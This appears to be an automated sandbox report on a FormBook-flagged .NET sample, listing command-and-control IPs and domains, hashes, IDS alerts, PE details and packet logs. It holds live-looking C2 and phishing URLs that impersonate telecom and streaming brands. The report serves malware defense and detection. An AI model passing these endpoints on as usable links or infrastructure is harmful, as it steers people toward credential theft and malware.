Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
203.161.43.228	file.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.firmshow.top/02nb/
	file.exe	Get hash	malicious	FormBook	Browse	www.firmshow.top/02nb/
	file.exe	Get hash	malicious	FormBook	Browse	www.firmshow.top/02nb/
	file.exe	Get hash	malicious	FormBook	Browse	www.firmshow.top/02nb/
	MUdeeReQ5R.exe	Get hash	malicious	FormBook	Browse	www.anoldshow.top/ii3e/
	file.exe	Get hash	malicious	FormBook	Browse	www.firmshow.top/02nb/
	hkLFB22XxS.exe	Get hash	malicious	FormBook	Browse	www.firmshow.top/02nb/
	file.exe	Get hash	malicious	FormBook	Browse	www.firmshow.top/02nb/
	file.exe	Get hash	malicious	FormBook	Browse	www.firmshow.top/02nb/
	scanned file.exe	Get hash	malicious	FormBook	Browse	www.techfirm.life/q3aw/?atIx56=65j+Em8vbA0b9ekM8gD1O+RqXUjbhA89agcyFrOK9tIOe4qFVeCIrHPiCIBKLeJhX3EQelscWW4TvORgVFTD9t5vpuMZ0Og92YRa0F26+VtQBz5v2g==&xPz=iteHld_xl
172.67.189.102	R86BRY7DdC.exe	Get hash	malicious	Snake Keylogger	Browse
	d34e1p5zD2.exe	Get hash	malicious	Unknown	Browse
	41DLTjkmOm.exe	Get hash	malicious	Remcos	Browse
38.47.158.215	file.exe	Get hash	malicious	FormBook	Browse	www.jl800.vip/g67v/
	file.exe	Get hash	malicious	FormBook	Browse	www.jl800.vip/g67v/
	hkLFB22XxS.exe	Get hash	malicious	FormBook	Browse	www.jl800.vip/g67v/
	file.exe	Get hash	malicious	FormBook	Browse	www.jl800.vip/g67v/
	hmwBElsQoPfbj1u.exe	Get hash	malicious	FormBook	Browse	www.jl800.vip/g67v/
	2023-1392 Martin y Ruiz Recambio Surtekpdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.jl800.vip/1f8k/
	justiicante transferencia compra vvda-pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.jl800.vip/1f8k/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
e6375a47.jl884.vip.cname.scname.com	file.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	38.47.158.160
	file.exe	Get hash	malicious	FormBook	Browse	38.47.158.160
	file.exe	Get hash	malicious	FormBook	Browse	65.181.132.158
	file.exe	Get hash	malicious	FormBook	Browse	65.181.132.158
	file.exe	Get hash	malicious	FormBook	Browse	38.47.158.160
	hkLFB22XxS.exe	Get hash	malicious	FormBook	Browse	65.181.132.158
	file.exe	Get hash	malicious	FormBook	Browse	38.47.158.160
	file.exe	Get hash	malicious	FormBook	Browse	65.181.132.158
	file.exe	Get hash	malicious	FormBook	Browse	38.47.158.160
	file.exe	Get hash	malicious	FormBook	Browse	38.47.158.160
www.firmshow.top	file.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	203.161.43.228
	file.exe	Get hash	malicious	FormBook	Browse	203.161.43.228
	file.exe	Get hash	malicious	FormBook	Browse	203.161.43.228
	file.exe	Get hash	malicious	FormBook	Browse	203.161.43.228
	file.exe	Get hash	malicious	FormBook	Browse	203.161.43.228
	hkLFB22XxS.exe	Get hash	malicious	FormBook	Browse	203.161.43.228
	file.exe	Get hash	malicious	FormBook	Browse	203.161.43.228
	file.exe	Get hash	malicious	FormBook	Browse	203.161.43.228
	file.exe	Get hash	malicious	FormBook	Browse	203.161.43.228
	file.exe	Get hash	malicious	FormBook	Browse	203.161.43.228

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
VNPT-AS-VNVNPTCorpVN	8SxJ9aYfJ1.exe	Get hash	malicious	FormBook	Browse	203.161.50.128
	xZ2Ha9PYPn.elf	Get hash	malicious	Mirai	Browse	113.178.195.43
	WIwTo1UTMq.elf	Get hash	malicious	Mirai	Browse	14.232.223.43
	5oXS6HtbzC.elf	Get hash	malicious	Mirai	Browse	222.254.141.105
	dGHiTqj3AB.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	203.161.42.162
	sh4.elf	Get hash	malicious	Mirai	Browse	14.178.148.115
	LisectAVT_2403002B_137.dll	Get hash	malicious	Trickbot	Browse	14.232.161.45
	stock request.exe	Get hash	malicious	FormBook	Browse	203.161.42.158
	irlsever.doc	Get hash	malicious	FormBook	Browse	203.161.42.162
	yIRn1ZmsQF.elf	Get hash	malicious	Unknown	Browse	113.162.243.185
COGENT-174US	AKPSrAWl2G.elf	Get hash	malicious	Mirai	Browse	38.15.202.245
	rLog7rmU2e.elf	Get hash	malicious	Mirai	Browse	149.104.218.162
	https://olive-hummingbird-763499.hostingersite.com/Onedrive-inboxmessage/onenote.html#asa@aan.pt	Get hash	malicious	Unknown	Browse	154.62.105.236
	setup#U641c#U72d7#U62fc#U97f3#U8f93#U5165#U6cd5_11_4002071.exe	Get hash	malicious	GhostRat, Mimikatz, Nitol	Browse	38.46.15.242
	OPEN BALANCE.exe	Get hash	malicious	FormBook	Browse	38.181.21.136
	file.exe	Get hash	malicious	RedLine	Browse	38.180.203.208
	file.exe	Get hash	malicious	RedLine	Browse	38.180.203.208
	LisectAVT_2403002A_222.exe	Get hash	malicious	Unknown	Browse	206.238.114.30
	LisectAVT_2403002A_252.exe	Get hash	malicious	Unknown	Browse	38.59.254.102
	LisectAVT_2403002A_252.exe	Get hash	malicious	Unknown	Browse	38.59.254.102
AMAZONEXPANSIONGB	8SxJ9aYfJ1.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	https://disney.apexanalytix.com/Help/DownloadFile?ID=P%2fgMga3n7lQ%3d	Get hash	malicious	Unknown	Browse	52.223.40.198
	dGHiTqj3AB.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	3.33.130.190
	SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	OPEN BALANCE.exe	Get hash	malicious	FormBook	Browse	3.33.244.179
	http://att-108796-103800.weeblysite.com/	Get hash	malicious	Unknown	Browse	3.33.220.150
	http://telstra-107506.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	52.223.40.198
	https://erratic-mellow-comte.glitch.me/public/nfcu703553.HTML	Get hash	malicious	HTMLPhisher	Browse	3.33.220.150
	http://telstra-107152.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	52.223.40.198
	Jeffrey.laws Replay VM (01m27sec).docx	Get hash	malicious	HTMLPhisher	Browse	52.223.40.198
CLOUDFLARENETUS	Ycj3d5NMhc.exe	Get hash	malicious	Unknown	Browse	104.21.65.79
	R86BRY7DdC.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.189.102
	d34e1p5zD2.exe	Get hash	malicious	Unknown	Browse	172.67.189.102
	QIKiV83Pkl.exe	Get hash	malicious	DCRat	Browse	172.67.19.24
	41DLTjkmOm.exe	Get hash	malicious	Remcos	Browse	172.67.189.102
	Ycj3d5NMhc.exe	Get hash	malicious	Unknown	Browse	104.21.65.79
	rwsNDpQSKZ.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	CBS_applcation_details_072602024_xlsx.js	Get hash	malicious	WSHRAT	Browse	188.114.96.3
	FpiUD4nYpj.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	104.26.2.16

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	d34e1p5zD2.exe	Get hash	malicious	Unknown	Browse	173.222.162.55
	https://azadengg.com/MTQwOTk4NzcwMg==sfmaxWjJWdUxYQm5lQzA0TXpVMU1EZ3dNMmxtZUdOb1lYWmxlbkpwYzNoaGFYSmliM0p1TG1OdmJRPT0=&c=E,1,LZxP3HHb1f9qSYvI9qirqXkUUBAc_Lly3K7xLwNdfYOBECyaKUoAd-t3gcHqWT79cExKeBU56i8wGFRIGcXn5xtHq6aoS1GJuvxV76lYjLuWHw,,&typo=1	Get hash	malicious	Unknown	Browse	173.222.162.55
	https://www.kudoboard.com/boards/ZWwsi9jg	Get hash	malicious	Unknown	Browse	173.222.162.55
	https://f522my.fi79.fdske.com/ec/gAAAAABmpB7T0a5uPS5ojzr4t_T3OUm-FdnelJXDBC1VoV6m2V3L_fPLJYD_I4iovDAQynFwUxenvGcRNh2X00urBe5-4u-rT9GnyUh1X4xs-bp1jFgbdnQWjG990ZIV-3jiRSF6xm2yQVII0IUZNMTwe6xA7L7bXWw_begThms8P6liFgUdG6VQSYwrbqAxhU2UEyqaypup8CoqX1XTXX22SapdlozSl3U2FuKV8U9lz4_YoWYvXaj9erwugsbbIzwuyoMgDRxdh9iJQFak65dYgkq2tGXY1LV-S0k2sDgZf7wEDr63jmpMQO3SzqMfQA3mGK6zccUXpwE0i3r8hj5z4np9jw5lE8Wcp6N7QIvI_qpBMTJqfmuaZZdQ5LOQYKgqx2tl9eUzVwZBUsvbcRUHD4gPhSo47eQGLiImSy0uueaOd9GD5v-xXSggcJV4oiu3m7MRPADdbsVfsrtFilW1dPy_5ezRxo0JN8be1WWGWOeTVzt3fK4=	Get hash	malicious	Unknown	Browse	173.222.162.55
	http://cache.netflix.com.sg5.wuush.us.kg/	Get hash	malicious	Unknown	Browse	173.222.162.55
	http://cache.netflix.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	173.222.162.55
	http://investors.spotify.com.th.wuush.us.kg/	Get hash	malicious	Unknown	Browse	173.222.162.55
	http://investors.spotify.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	173.222.162.55
	http://cache.netflix.com.sg3.wuush.us.kg/	Get hash	malicious	Unknown	Browse	173.222.162.55
	http://apple.vn377.com/	Get hash	malicious	Unknown	Browse	173.222.162.55
54328bd36c14bd82ddaa0c04b25ed9ad	R86BRY7DdC.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.189.102
	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.189.102
	SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exe	Get hash	malicious	Unknown	Browse	172.67.189.102
	SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exe	Get hash	malicious	Unknown	Browse	172.67.189.102
	SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.189.102
	new order 00041221.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.189.102
	New Order.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	172.67.189.102
	LisectAVT_2403002B_361.exe	Get hash	malicious	Quasar	Browse	172.67.189.102
	SWIFT.exe	Get hash	malicious	Lokibot	Browse	172.67.189.102
	Payment_Advice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.189.102

Process:	C:\Users\user\Desktop\9B1ZyhsFUq.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1055
Entropy (8bit):	5.363579999787589
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIsCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIsCYHKGSI6oPtHTHhAHKK4
MD5:	934DBC1E02CF807D1963341902D2D0AF
SHA1:	88B7030115ABFDCE452EE7E84283DF386EAF9AD9
SHA-256:	6F38290F811AED98A3DBE2B0F93F9C4957F733C161BADECA0FB25ABE39649D3C
SHA-512:	F61786328389DBE55CB9E9047E718E47E5BDD71287B47D7DF8ADFCED1CE8A1FEC8FDF67668D8AA33BF54DF62604289D30AB8E1104B3F093A0D49C74D70C6DA04
Malicious:	true
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\

C:\Users\user\AppData\Local\Temp\-16743

Download File

Process:	C:\Windows\SysWOW64\convert.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1211596417522893
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
MD5:	0AB67F0950F46216D5590A6A41A267C7
SHA1:	3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
SHA-256:	4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
SHA-512:	D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.670460624668989
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	9B1ZyhsFUq.exe
File size:	65'536 bytes
MD5:	0c7b233a4bf0fc22c9e2a49818bc90a1
SHA1:	026eeec2d42c9f20c66e9c9bd52f495e83a689f0
SHA256:	d1743c107eedb9e740537df6cd35db93dd2a45ea952f4712ca134846dba1c7e5
SHA512:	6092bf981adab207a65a3f5db186c2464e3b8fe8117ba4b02a17aab42596763254b2b2a790b0676823dc15b0ad50d0c0c017227577e7cc8275fb26cb0129fd05
SSDEEP:	768:smlnP9l9Mz43cLyxG3dauJQY/M0Wcy8ig4bnq6M8slJ7mqNtGGvs0+GlOwxmTqq:bFY/M0WgcW8slgos0+
TLSH:	53531831BBADCA7BC7EE67BD6492022017B9C146F103FB9B2D4C50957A527025D322EB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Ri.f............................B.... ... ....@.. .......................@............@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x411b42
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A06952 [Wed Jul 24 02:39:14 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00411B50h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and al, 1Bh
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push edx
imul esp, dword ptr [eax+00000066h], 00000200h
add byte ptr [edx+00h], cl
add byte ptr [eax], al
je 00007F24C4E3846Dh
add dword ptr [eax], eax
je 00007F24C4E3844Fh
add byte ptr [eax], al
push edx
push ebx
inc esp
push ebx
jnle 00007F24C4E38470h
pop ds
cmp ebx, ecx
dec esi
mov ch, C6h
aam 7Ch
xchg eax, edi
dec esp
push ecx
add dword ptr [eax], eax
add byte ptr [eax], al
inc ebx
cmp bl, byte ptr [ebp+edx*2+73h]
jc 00007F24C4E384C6h
pop esp
inc ecx
insd
imul ebp, dword ptr [esi+69h], 61727473h
je 00007F24C4E384C1h
jc 00007F24C4E384AEh
inc esp
jnc 00007F24C4E384BEh
je 00007F24C4E384C1h
jo 00007F24C4E384AEh
dec edi
jne 00007F24C4E384C6h
jo 00007F24C4E384C7h
je 00007F24C4E384C5h
pop esp
push ebx
jo 00007F24C4E384B4h
imul esi, dword ptr [edi+2Eh], 00626470h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x11af4	0x4c	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x12000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x11b58	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x11b50	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xfbbe	0xfc00	7b24c1653035c4695ad508c9b22c2f64	False	0.44560701884920634	data	5.718544807931981	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc	0x12000	0xc	0x200	2364e5def21021ba3c260d48dc322f27	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-27T11:40:41.367654+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49719	80	192.168.2.10	203.161.43.228
2024-07-27T11:40:32.769255+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49717	80	192.168.2.10	3.33.130.190
2024-07-27T11:40:25.161713+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49714	80	192.168.2.10	3.33.130.190
2024-07-27T11:40:55.569047+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49723	80	192.168.2.10	38.47.158.215
2024-07-27T11:41:09.490501+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49727	80	192.168.2.10	3.33.130.190
2024-07-27T11:40:27.702875+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49715	80	192.168.2.10	3.33.130.190
2024-07-27T11:40:46.414120+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49721	80	192.168.2.10	203.161.43.228
2024-07-27T11:39:59.149683+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49712	52.165.165.26	192.168.2.10
2024-07-27T11:39:20.746813+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49707	52.165.165.26	192.168.2.10
2024-07-27T11:40:43.923573+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49720	80	192.168.2.10	203.161.43.228
2024-07-27T11:40:01.487944+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49713	80	192.168.2.10	38.47.158.160
2024-07-27T11:41:00.657074+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49725	80	192.168.2.10	38.47.158.215
2024-07-27T11:40:38.802513+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49718	80	192.168.2.10	203.161.43.228
2024-07-27T11:41:06.189487+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49726	80	192.168.2.10	3.33.130.190
2024-07-27T11:40:58.796775+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49724	80	192.168.2.10	38.47.158.215
2024-07-27T11:40:30.225966+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49716	80	192.168.2.10	3.33.130.190
2024-07-27T11:40:53.249832+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49722	80	192.168.2.10	38.47.158.215

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2024 11:38:56.218168020 CEST	49671	443	192.168.2.10	204.79.197.203
Jul 27, 2024 11:38:58.593310118 CEST	49674	443	192.168.2.10	173.222.162.55
Jul 27, 2024 11:38:58.593333960 CEST	49675	443	192.168.2.10	173.222.162.55
Jul 27, 2024 11:38:58.624408007 CEST	49671	443	192.168.2.10	204.79.197.203
Jul 27, 2024 11:39:02.238020897 CEST	49705	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:02.238060951 CEST	443	49705	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:02.238133907 CEST	49705	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:02.268671989 CEST	49705	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:02.268703938 CEST	443	49705	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:02.359014988 CEST	49677	443	192.168.2.10	20.42.65.85
Jul 27, 2024 11:39:02.671216011 CEST	49677	443	192.168.2.10	20.42.65.85
Jul 27, 2024 11:39:02.800460100 CEST	443	49705	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:02.800554991 CEST	49705	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:02.865940094 CEST	49705	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:02.865957975 CEST	443	49705	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:02.866378069 CEST	443	49705	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:02.921190023 CEST	49705	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:03.280592918 CEST	49677	443	192.168.2.10	20.42.65.85
Jul 27, 2024 11:39:03.436841965 CEST	49671	443	192.168.2.10	204.79.197.203
Jul 27, 2024 11:39:03.445821047 CEST	49705	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:03.488518000 CEST	443	49705	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:03.723649025 CEST	443	49705	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:03.723695040 CEST	443	49705	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:03.723762989 CEST	49705	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:03.723781109 CEST	443	49705	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:03.724024057 CEST	443	49705	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:03.724123955 CEST	49705	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:03.724133968 CEST	443	49705	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:03.724869967 CEST	443	49705	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:03.724917889 CEST	443	49705	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:03.724924088 CEST	49705	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:03.724930048 CEST	443	49705	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:03.725070000 CEST	49705	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:03.725833893 CEST	443	49705	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:03.725893974 CEST	443	49705	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:03.725946903 CEST	49705	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:03.725953102 CEST	443	49705	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:03.780574083 CEST	49705	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:03.780582905 CEST	443	49705	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:03.805721045 CEST	443	49705	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:03.805788040 CEST	49705	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:03.805794954 CEST	443	49705	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:03.805900097 CEST	49705	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:03.807028055 CEST	49705	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:03.807051897 CEST	443	49705	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.007477999 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:04.007519007 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.007704020 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:04.007905960 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:04.007927895 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.483724117 CEST	49677	443	192.168.2.10	20.42.65.85
Jul 27, 2024 11:39:04.499295950 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.500581980 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:04.500597000 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.501912117 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:04.501915932 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.801729918 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.801795959 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.801865101 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:04.801875114 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.802299976 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.802592993 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:04.802598000 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.803106070 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.803136110 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.803198099 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:04.803204060 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.803312063 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:04.803886890 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.803944111 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.804450989 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:04.804456949 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.845712900 CEST	49706	443	192.168.2.10	172.67.189.102
Jul 27, 2024 11:39:04.845729113 CEST	443	49706	172.67.189.102	192.168.2.10
Jul 27, 2024 11:39:04.890130043 CEST	49706	443	192.168.2.10	172.67.189.102
